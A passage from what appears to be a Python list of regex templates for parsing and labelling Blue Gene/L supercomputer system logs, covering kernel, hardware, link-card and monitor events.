r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL INFO icache prefetch threshold................[01]$",
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL INFO instruction address space.........[01]$",
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL INFO instruction cache parity error corrected$",
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL INFO Kernel detected .+? integer alignment exceptions.*?$".format(hex_address=hex_address,hexcharcol=hexcharcol, ip4andport=ip4andport, eight_hex=eight_hex, ),
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL INFO L1 DCACHE summary averages: #ofDirtyLines: .+? out of .+? #ofDirtyDblWord: .+? out of .+?$".format(hex_address=hex_address, eight_hex=eight_hex, ),
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL INFO L3 correctable errors exceeds threshold \(iar {hex_address} lr {hex_address}\)$".format(hex_address=hex_address, ),
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL INFO MACHINE CHECK DCR read timeout \(mc=.+? iar {hex_address} lr {hex_address}\)$".format(hex_address=hex_address,hexcharcol=hexcharcol, ip4andport=ip4andport, eight_hex=eight_hex, ),
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL INFO machine check enable..............[01]$",
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL INFO MACHINE CHECK PLB write IRQ \(mc=.+? iar {hex_address} lr {hex_address}\)$".format(hex_address=hex_address,hexcharcol=hexcharcol, ip4andport=ip4andport, eight_hex=eight_hex, ),
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL INFO machine check: i-fetch......................[01]$",
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL INFO Microloader Assertion$".format( ),
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL INFO NFS Mount failed on .+?, slept .+? seconds, retrying \(.+?\)$".format(eight_hex=eight_hex, ),
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL INFO problem state \(0=sup,1=usr\).......[01]$",
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL INFO program interrupt$",
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL INFO program interrupt: fp compare...............[01]$",
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL INFO program interrupt: fp cr field .............[01]$",
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL INFO program interrupt: fp cr update.............[01]$",
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL INFO program interrupt: illegal instruction......[01]$",
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL INFO program interrupt: imprecise exception......[01]$",
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL INFO program interrupt: privileged instruction...[01]$",
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL INFO program interrupt: trap instruction.........[01]$",
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL INFO program interrupt: unimplemented operation..[01]$",
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL INFO shutdown complete$".format( LP_ADDRESS=LP_ADDRESS),
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL INFO special purpose registers:$",
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL INFO SRAM correctable errors exceeds threshold \(iar {hex_address} lr {hex_address}\)$".format(hex_address=hex_address, eight_hex=eight_hex, ),
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL INFO store operation.............................[01]$",
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL INFO suppressing further interrupts of same type$",
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL INFO total of .+? ddr error\(s\) detected and corrected over .+? seconds$".format(hex_address=hex_address, eight_hex=eight_hex, ),
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL INFO wait state enable.................[01]$",
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL INFO {ce_sym}$".format( ce_sym = ce_sym),
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL INFO {ciod_message_code}$".format( ciod_message_code=ciod_message_code),
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL INFO {ciod_read_continuation}$".format( ciod_read_continuation=ciod_read_continuation),
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL INFO {ciod_unrecognized_message}$".format( ciod_unrecognized_message=ciod_unrecognized_message),
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL INFO {ciod_xcoordinate_exceeded}$".format( ciod_xcoordinate_exceeded=ciod_xcoordinate_exceeded),
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL INFO {data_address}$".format( data_address=data_address),
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL INFO {ddr_error_detected_on_rank}$".format( ddr_error_detected_on_rank = ddr_error_detected_on_rank),
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL INFO {ddr_redundant_bit_steering}$".format( ddr_redundant_bit_steering = ddr_redundant_bit_steering),
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL INFO {ddr_unable_to_steer_rank}$".format( ddr_unable_to_steer_rank=ddr_unable_to_steer_rank),
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL INFO {double_hummer_exceptions}$".format( double_hummer_exceptions = double_hummer_exceptions),
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL INFO {general_purpose_registers}$".format( general_purpose_registers=general_purpose_registers),
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL INFO {generating_core}$".format( generating_core=generating_core),
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL INFO {instruction_address}$".format( instruction_address=instruction_address),
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL INFO {l3_directory_errors_detected}$".format( l3_directory_errors_detected=l3_directory_errors_detected),
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL INFO {l3_edram_error}$".format( l3_edram_error = l3_edram_error),
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL INFO {special_purpose_registers}$".format( special_purpose_registers=special_purpose_registers),
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL INFO {torus_reciever_error}$".format( torus_reciever_error=torus_reciever_error),
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL INFO {torus_sender_corrected}$".format( torus_sender_corrected=torus_sender_corrected),
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL INFO {torus_sram_repetition}$".format( torus_sram_repetition=torus_sram_repetition),
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL INFO {total_ddr_errors}$".format( total_ddr_errors = total_ddr_errors),
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL INFO {tree_receiver_detected}$".format( tree_receiver_detected = tree_receiver_detected),
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL INFO$".format(eight_hex=eight_hex, ),
r"^- TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL INFO.+? torus receiver sram ecc error\(s\) \(dcr 0x.+?\) detected and corrected$".format( ),
r"^- TIME_STAMP SHORT_DATE NODE_ID_02 DATE_TIME NODE_ID_02 RAS LINKCARD INFO MidplaneSwitchController performing bit sparing on {nodeid2} bit \d+?$".format(nodeid2=nodeid2, ),
r"^- TIME_STAMP SHORT_DATE NODE_ID_03 DATE_TIME NODE_ID_03 NULL DISCOVERY ERROR Found invalid node ecid in processor card slot J\d+?, ecid {hexchar}+?$".format(hexchar=hexchar, hex_address=hex_address, LP_ADDRESS=LP_ADDRESS, ip4andport=ip4andport, nodeid3=nodeid3),
# - TIME_STAMP SHORT_DATE NODE_ID_03 DATE_TIME NODE_ID_03 NULL DISCOVERY ERROR Node card status: no ALERTs are active. Clock Mode is Low. Clock Select is Midplane. Phy JTAG Reset is asserted. ASIC JTAG Reset is asserted. Temperature Mask is not active. No temperature error. Temperature Limit Error Latch is clear. PGOOD IS NOT ASSERTED. PGOOD ERROR LATCH IS ACTIVE. MPGOOD IS NOT OK. MPGOOD ERROR LATCH IS ACTIVE. The 2.5 volt rail is OK. The 1.5 volt rail is OK.
r"^- TIME_STAMP SHORT_DATE (NODE_ID_03|UNKNOWN_LOCATION) DATE_TIME (NODE_ID_03|UNKNOWN_LOCATION) NULL DISCOVERY ERROR Node card status: .+?active\. Clock Mode.*?$",
r"^- TIME_STAMP SHORT_DATE NODE_ID_03 DATE_TIME NODE_ID_03 NULL DISCOVERY SEVERE Problem reading the ethernet arl entries fro the service card: java.lang.IllegalStateException: while executing I2C Operation caught java.lang.RuntimeException: Communication error: \(DirectIDo for com.ibm.ido.DirectIDo object \[{LP_ADDRESS}\@/{ip4andport} with image version 9 and card type 2\] is in state = COMMUNICATION_ERROR, sequenceNumberIsOk = false, ExpectedSequenceNumber = .+?, Reply Sequence Number = .+?, timedOut = true, retries = 200, timeout = 1000, Expected Op Command = .+?, Actual Op Reply = .+?, Expected Sync Command = .+?, Actual Sync Reply = .+?\)$".format( LP_ADDRESS=LP_ADDRESS, ip4andport=ip4andport, nodeid3=nodeid3),
r"^- TIME_STAMP SHORT_DATE NODE_ID_03 DATE_TIME NODE_ID_03 NULL HARDWARE SEVERE NodeCard power module U\d\d is not accessible$".format( ),
r"^- TIME_STAMP SHORT_DATE NODE_ID_03 DATE_TIME NODE_ID_03 NULL HARDWARE WARNING EndServiceAction \d+?.*? performed upon {nodeid3} by .+?$".format( nodeid3=nodeid3, ),
r"^- TIME_STAMP SHORT_DATE NODE_ID_03 DATE_TIME NODE_ID_03 NULL HARDWARE WARNING EndServiceAction is restarting the (Link cards|LinkCards) in [mM]idplane {nodeid3} as part of Service Action \d+?$".format(nodeid3=nodeid3, hex_address=hex_address,hexcharcol=hexcharcol, ip4andport=ip4andport, eight_hex=eight_hex, ),
r"^- TIME_STAMP SHORT_DATE NODE_ID_03 DATE_TIME NODE_ID_03 NULL HARDWARE WARNING PrepareForService is being done on this Midplane \(mLctn\({nodeid3}\), mCardSernum\(.+?\), iWhichCardsToPwrOff\(.+?\)\) by .+?$".format(hex_address=hex_address, eight_hex=eight_hex, nodeid3=nodeid3, ),
r"^- TIME_STAMP SHORT_DATE NODE_ID_03 DATE_TIME NODE_ID_03 NULL HARDWARE WARNING PrepareForService shutting down (LinkCard|Link card)\(mLctn\({nodeid3}\), mCardSernum\(\w+?\), mLp\({LP_ADDRESS}\), mIp\({ip4address}\), mType\(.*?\)\) as part of Service Action \d+?$".format( nodeid3=nodeid3, LP_ADDRESS=LP_ADDRESS,ip4address=ip4address),
r"^- TIME_STAMP SHORT_DATE NODE_ID_03 DATE_TIME NODE_ID_03 NULL HARDWARE WARNING PrepareForService shutting down Node card\(mLctn\({nodeid3}\), mCardSernum\(.+?\), mLp\({hexcharcol}+?\), mIp\({ip4address}\), mType\(.+?\)\) as part of Service Action .+?$".format(hex_address=hex_address,hexcharcol=hexcharcol, ip4address=ip4address, eight_hex=eight_hex, nodeid3=nodeid3, ),
# - TIME_STAMP SHORT_DATE UNKNOWN_LOCATION DATE_TIME UNKNOWN_LOCATION NULL HARDWARE WARNING EndServiceAction is restarting the NodeCards in midplane R33-M1 as part of Service Action 219
r"^- TIME_STAMP SHORT_DATE (NODE_ID_03|UNKNOWN_LOCATION) DATE_TIME (NODE_ID_03|UNKNOWN_LOCATION) NULL HARDWARE WARNING EndServiceAction is restarting the (NodeCards|Node cards) in midplane {nodeid3} as part of Service Action \d+?$".format(nodeid3=nodeid3),
r"^- TIME_STAMP SHORT_DATE NODE_ID_03 DATE_TIME NODE_ID_03 NULL HARDWARE WARNING {hardware_warning_shutdown}$".format( hardware_warning_shutdown= hardware_warning_shutdown),
r"^- TIME_STAMP SHORT_DATE NODE_ID_03 DATE_TIME NODE_ID_03 NULL HARDWARE WARNING {hardware_warning}$".format( hardware_warning= hardware_warning),
r"^- TIME_STAMP SHORT_DATE NODE_ID_03 DATE_TIME NODE_ID_03 NULL HARDWARE WARNING {prepare_for_service_on_this_part}$".format( prepare_for_service_on_this_part=prepare_for_service_on_this_part),
r"^- TIME_STAMP SHORT_DATE NODE_ID_03 DATE_TIME NODE_ID_03 NULL MONITOR FAILURE (Hardware )?monitor caught java.lang.IllegalStateException: while executing .+? Operation caught java.net.SocketException: Broken pipe and is stopping$",
r"^- TIME_STAMP SHORT_DATE NODE_ID_03 DATE_TIME NODE_ID_03 NULL MONITOR FAILURE (Hardware )?monitor caught java.net.SocketException: Broken pipe and is stopping$",
r"^- TIME_STAMP SHORT_DATE NODE_ID_03 DATE_TIME NODE_ID_03 NULL MONITOR FAILURE Link PGOOD error latched on link card$",
r"^- TIME_STAMP SHORT_DATE NODE_ID_03 DATE_TIME NODE_ID_03 NULL MONITOR FAILURE Local PGOOD error latched on link card$",
r"^- TIME_STAMP SHORT_DATE NODE_ID_03 DATE_TIME NODE_ID_03 NULL MONITOR FAILURE Temperature Over Limit on link card$",
r"^- TIME_STAMP SHORT_DATE NODE_ID_03 DATE_TIME NODE_ID_03 NULL MONITOR FAILURE While reading FanModule caught java.lang.IllegalStateException: while executing I2C Operation .*?$",
r"^- TIME_STAMP SHORT_DATE NODE_ID_03 DATE_TIME NODE_ID_03 NULL MONITOR FAILURE While setting fan speed caught java.lang.IllegalStateException: while executing I2C Operation .*?$",
r"^- TIME_STAMP SHORT_DATE NODE_ID_03 DATE_TIME NODE_ID_03 NULL MONITOR SEVERE Hardware monitor caught java.net.SocketException: Broken pipe and is stopping$".format(hex_address=hex_address,hexcharcol=hexcharcol, ip4andport=ip4andport, eight_hex=eight_hex, nodeid3=nodeid3, ),
r"^- TIME_STAMP SHORT_DATE NULL DATE_TIME NULL RAS BGLMASTER FAILURE idoproxy exited normally with exit code 0$".format( ),
r"^- TIME_STAMP SHORT_DATE NULL DATE_TIME NULL RAS BGLMASTER INFO BGLMaster has been started: ./BGLMaster --consoleip 127.0.0.1 --consoleport 32035 --configfile bglmaster.init.*?$",
r"^- TIME_STAMP SHORT_DATE NULL DATE_TIME NULL RAS MMCS ERROR Ido packet timeout$",
r"^- TIME_STAMP SHORT_DATE NULL DATE_TIME NULL RAS MMCS INFO {ciodb_has_been_restarted}$".format( ciodb_has_been_restarted=ciodb_has_been_restarted),
r"^- TIME_STAMP SHORT_DATE NULL DATE_TIME NULL RAS MMCS INFO {ido_proxy_has_been_started}$".format( ido_proxy_has_been_started = ido_proxy_has_been_started),
r"^- TIME_STAMP SHORT_DATE NULL DATE_TIME NULL RAS MMCS INFO {mmcs_db_server_started}$".format( mmcs_db_server_started=mmcs_db_server_started),
r"^- TIME_STAMP SHORT_DATE UNKNOWN_LOCATION DATE_TIME UNKNOWN_LOCATION NULL CMCS INFO Controlling BG/L rows \[( \d)+ \]$",
r"^- TIME_STAMP SHORT_DATE UNKNOWN_LOCATION DATE_TIME UNKNOWN_LOCATION NULL CMCS INFO Running as background command$",
r"^- TIME_STAMP SHORT_DATE UNKNOWN_LOCATION DATE_TIME UNKNOWN_LOCATION NULL CMCS INFO Starting SystemController$",
r"^- TIME_STAMP SHORT_DATE UNKNOWN_LOCATION DATE_TIME UNKNOWN_LOCATION NULL DISCOVERY INFO {ido_chipstatus_changed}$".format( ido_chipstatus_changed=ido_chipstatus_changed),
r"^- TIME_STAMP SHORT_DATE UNKNOWN_LOCATION DATE_TIME UNKNOWN_LOCATION NULL DISCOVERY SEVERE Error getting detailed hw info for node, caught java.io.IOException: .*?$",
r"^- TIME_STAMP SHORT_DATE UNKNOWN_LOCATION DATE_TIME UNKNOWN_LOCATION NULL DISCOVERY SEVERE {bgl_ido_chip_table}$".format( bgl_ido_chip_table=bgl_ido_chip_table),
r"^- TIME_STAMP SHORT_DATE UNKNOWN_LOCATION DATE_TIME UNKNOWN_LOCATION NULL DISCOVERY SEVERE {serialnumber_ipaddress}$".format( serialnumber_ipaddress=serialnumber_ipaddress),
r"^- TIME_STAMP SHORT_DATE UNKNOWN_LOCATION DATE_TIME UNKNOWN_LOCATION NULL DISCOVERY WARNING Problem communicating with service card, ido chip: {hexcharcol}+?\. java.lang.IllegalStateException: while executing CONTROL Operation caught java.lang.RuntimeException: Communication error: \(DirectIDo for com.ibm.ido.DirectIDo object \[{LP_ADDRESS}@/{ip4andport} with image version \d+? and card type \d+?] is in state = COMMUNICATION_ERROR, sequenceNumberIsOk = false, ExpectedSequenceNumber = .+?, Reply Sequence Number = .+?, timedOut = true, retries = 200, timeout = 1000, Expected Op Command = .+?, Actual Op Reply = .+?, Expected Sync Command = .+?, Actual Sync Reply = .+?\)$".format(hexcharcol=hexcharcol, LP_ADDRESS=LP_ADDRESS, ip4andport=ip4andport),
r"^- TIME_STAMP SHORT_DATE UNKNOWN_LOCATION DATE_TIME UNKNOWN_LOCATION NULL HARDWARE SEVERE NodeCard power module U\d\d is not accessible$".format( ),
r"^- TIME_STAMP SHORT_DATE UNKNOWN_LOCATION DATE_TIME UNKNOWN_LOCATION NULL HARDWARE SEVERE NodeCard temperature sensor chip U\d\d is not accessible$",
r"^- TIME_STAMP SHORT_DATE UNKNOWN_LOCATION DATE_TIME UNKNOWN_LOCATION NULL HARDWARE SEVERE NodeCard VPD chip is not accessible$",
r"^- TIME_STAMP SHORT_DATE UNKNOWN_LOCATION DATE_TIME UNKNOWN_LOCATION NULL HARDWARE SEVERE NodeCard VPD is corrupt$",
r"^- TIME_STAMP SHORT_DATE UNKNOWN_LOCATION DATE_TIME UNKNOWN_LOCATION NULL HARDWARE WARNING EndServiceAction \d+?.*? performed upon {nodeid3} by .+?$".format( nodeid3=nodeid3, ),
r"^- TIME_STAMP SHORT_DATE UNKNOWN_LOCATION DATE_TIME UNKNOWN_LOCATION NULL HARDWARE WARNING EndServiceAction is restarting the LinkCards in midplane {nodeid3} as part of Service Action \d\d\d$".format( nodeid3=nodeid3, ),
r"^- TIME_STAMP SHORT_DATE UNKNOWN_LOCATION DATE_TIME UNKNOWN_LOCATION NULL HARDWARE WARNING EndServiceAction is restarting the (NodeCards|Node cards) in midplane {nodeid3} as part of Service Action \d+?$",
r"^- TIME_STAMP SHORT_DATE UNKNOWN_LOCATION DATE_TIME UNKNOWN_LOCATION NULL SERV_NET ERROR DeclareServiceNetworkCharacteristics has been run with the force option but the DB is not empty$".format( ip4andport=ip4andport),
r"^- TIME_STAMP SHORT_DATE UNKNOWN_LOCATION DATE_TIME UNKNOWN_LOCATION NULL SERV_NET INFO Added 8 subnets and 409600 addresses to DB$".format( ip4andport=ip4andport),
r"^- TIME_STAMP SHORT_DATE UNKNOWN_LOCATION DATE_TIME UNKNOWN_LOCATION NULL SERV_NET WARNING DeclareServiceNetworkCharacteristics has been run but the DB is not empty$".format( ip4andport=ip4andport),
r"^(APPALLOC|APPBUSY|APPCHILD) TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS APP FATAL ciod: Error creating node map from file .+?: .+?$",
r"^APP.+? TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS APP FATAL {ciod_login_input_output}$".format( ciod_login_input_output=ciod_login_input_output),
r"^APPREAD TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS APP FATAL ciod: failed to read message prefix on control stream \(CioStream socket to {ip4andport}".format( ip4andport=ip4andport),
r"^APP.+? TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS APP FATAL ciod: Error reading message prefix after .+? on CioStream socket to {ip4andport}: .+?$".format( ip4andport=ip4andport),
r"^APP.+? TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS APP FATAL ciod: Error reading message prefix on CioStream socket to {ip4andport}, .+?$".format(hex_address=hex_address,hexcharcol=hexcharcol, ip4andport=ip4andport, eight_hex=eight_hex, ),
r"^APPTORUS TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS APP FATAL external input interrupt \(unit=0x02 bit=0x00\): uncorrectable torus error$",
r"^APPUNAV TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS APP FATAL ciod: Error creating node map from file /.+?: Resource temporarily unavailable$",
r"^KERNBIT TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL FATAL ddr: redundant bit steering failed, sequencer timeout$",
r"^KERNCON TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL FATAL idoproxy communication failure: BGLERR_IDO_PKT_TIMEOUT connection lost to node/link/service card$".format(hex_address=hex_address,hexcharcol=hexcharcol, ip4andport=ip4andport, eight_hex=eight_hex, ),
r"^KERNCON TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL FATAL MailboxMonitor::serviceMailboxes\(\) lib_ido_error: -1033 BGLERR_IDO_PKT_TIMEOUT connection lost to node/link/service card$",
r"^KERNDTLB TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL FATAL data TLB error interrupt$",
r"^KERNEXT TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL FATAL external input interrupt \(unit=0x.+? bit=0x.+?\): tree header with no target waiting$",
r"^KERNFLOAT TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL FATAL floating point unavailable interrupt$",
r"^KERNMC TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL FATAL DDR machine check register: {hex_address} {hex_address}$".format(hex_address=hex_address, ),
r"^KERNMC TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL FATAL machine check interrupt.*?$",
r"^KERNMICRO TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL FATAL Microloader Assertion$",
r"^KERNMNT TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL FATAL Error: unable to mount filesystem$",
r"^KERNMNTF TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL FATAL Lustre mount FAILED : .+? .+?",
r"^KERNNOETH TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL FATAL no ethernet link$",
r"^KERNPAN TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL FATAL kernel panic$",
r"^KERNPOW TIME_STAMP SHORT_DATE NULL DATE_TIME NULL RAS KERNEL FATAL Power deactivated: {nodeid3}$".format( nodeid3=nodeid3, ),
r"^KERNPROG TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL FATAL program interrupt$",
r"^KERNREC TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL FATAL Error receiving packet on tree network.*?$".format(hex_address=hex_address,hexcharcol=hexcharcol, ip4andport=ip4andport, eight_hex=eight_hex, ),
r"^KERNRTSA TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL FATAL rts assertion failed: .*?$",
r"^KERNRTSP TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL FATAL rts panic! - stopping execution$",
r"^KERNSERV TIME_STAMP SHORT_DATE (NODE_ID_01|NULL) DATE_TIME (NODE_ID_01|NULL) RAS KERNEL FATAL Power Good signal deactivated: {nodeid3}. A service action may be required.$".format(nodeid3=nodeid3),
r"^KERNSOCK TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL FATAL idoproxy communication failure: socket closed$".format(hex_address=hex_address, eight_hex=eight_hex, ),
r"^KERNSOCK TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL FATAL MailboxMonitor::serviceMailboxes\(\) lib_ido_error: -1019 socket closed$",
r"^KERNSTOR TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL FATAL data storage interrupt$",
r"^KERNTERM TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL FATAL rts: kernel terminated for reason .*?$",
r"^KERNTLBE TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL FATAL instruction TLB error interrupt$".format( ip4andport=ip4andport),
r"^LINKBLL TIME_STAMP SHORT_DATE NODE_ID_02 DATE_TIME NODE_ID_02 RAS LINKCARD FATAL MidplaneSwitchController::clearPort\(\) bll_clear_port failed: {nodeid2}$".format( nodeid2=nodeid2, ip4andport=ip4andport),
r"^LINKDISC TIME_STAMP SHORT_DATE NODE_ID_02 DATE_TIME NODE_ID_02 RAS LINKCARD FATAL MidplaneSwitchController::sendTrain\(\) port disconnected: {nodeid2}$".format( nodeid2=nodeid2, ),
r"^LINKIAP TIME_STAMP SHORT_DATE NODE_ID_02 DATE_TIME NODE_ID_02 RAS LINKCARD FATAL MidplaneSwitchController::receiveTrain\(\) iap failed: {nodeid2}, status={eight_hex} {eight_hex}$".format(eight_hex=eight_hex, nodeid2=nodeid2, ),
r"^LINKPAP TIME_STAMP SHORT_DATE NODE_ID_02 DATE_TIME NODE_ID_02 RAS LINKCARD FATAL MidplaneSwitchController::parityAlignment\(\) pap failed: {nodeid2}, status={eight_hex} {eight_hex}$".format(eight_hex=eight_hex, nodeid2=nodeid2),
r"^MASABNORM TIME_STAMP SHORT_DATE NULL DATE_TIME NULL RAS BGLMASTER FAILURE mmcs_server exited abnormally due to signal: .+?$",
r"^MASABNORM TIME_STAMP SHORT_DATE NULL DATE_TIME NULL RAS BGLMASTER FAILURE {ciodb_exited_abnormally}$".format(ciodb_exited_abnormally=ciodb_exited_abnormally),
r"^MASNORM TIME_STAMP SHORT_DATE NULL DATE_TIME NULL RAS BGLMASTER FAILURE {mmcs_server_exited_normally}$".format( mmcs_server_exited_normally=mmcs_server_exited_normally),
r"^MMCS TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS MMCS FATAL L3 major internal error$",
r"^MONILL TIME_STAMP SHORT_DATE NODE_ID_03 DATE_TIME NODE_ID_03 NULL MONITOR FAILURE monitor caught java.lang.IllegalStateException: while executing CONTROL Operation caught java.io.EOFException and is stopping$",
r"^MONNULL TIME_STAMP SHORT_DATE NODE_ID_03 DATE_TIME NODE_ID_03 NULL MONITOR FAILURE While inserting monitor info into DB caught java.lang.NullPointerException$".format( ip4andport=ip4andport),
r"^MONPOW TIME_STAMP SHORT_DATE NODE_ID_03 DATE_TIME NODE_ID_03 NULL MONITOR FAILURE monitor caught java.lang.UnsupportedOperationException: power module U\d\d not present and is stopping$".format( ip4andport=ip4andport),
r"^MONPOW TIME_STAMP SHORT_DATE NODE_ID_03 DATE_TIME NODE_ID_03 NULL MONITOR FAILURE No power module U.+? found found on link card$".format(hex_address=hex_address, eight_hex=eight_hex, ),
r"^MONPOW TIME_STAMP SHORT_DATE NODE_ID_03 DATE_TIME NODE_ID_03 NULL MONITOR FAILURE power module status fault detected on node card. status registers are: .+?$".format(eight_hex=eight_hex, ),
r"^R_DDR_EXC TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL INFO {ddr_excessive_soft_failures}$".format( ddr_excessive_soft_failures = ddr_excessive_soft_failures),
